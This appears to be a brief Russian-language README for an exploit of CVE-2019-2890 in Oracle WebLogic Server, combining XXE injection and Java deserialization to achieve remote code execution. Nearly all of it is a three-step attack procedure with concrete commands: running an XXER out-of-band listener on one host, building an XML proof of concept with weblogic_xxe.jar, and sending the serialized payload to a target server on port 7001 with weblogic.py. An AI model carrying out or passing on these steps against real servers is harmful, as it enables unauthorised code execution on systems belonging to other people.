
Эксплойт для CVE-2019-2890, нацеленный на Oracle WebLogic Server через XXE-инъекцию и десериализацию, позволяющий удаленное выполнение кода с помощью специально созданных полезных нагрузок.
1)Запустить инструмент XXER python xxer.py -H 192.168.17.223
2)Поместить poc xxer в файл xx.xml, заменить сериализованные данные, внедрить poc xxer; java -jar weblogic_xxe.jar xx.xml
3)Использовать weblogic.py из инструмента java-deserialization-exploit для отправки данных на сервер weblogic python weblogic.py 192.168.17.222 7001 weblogic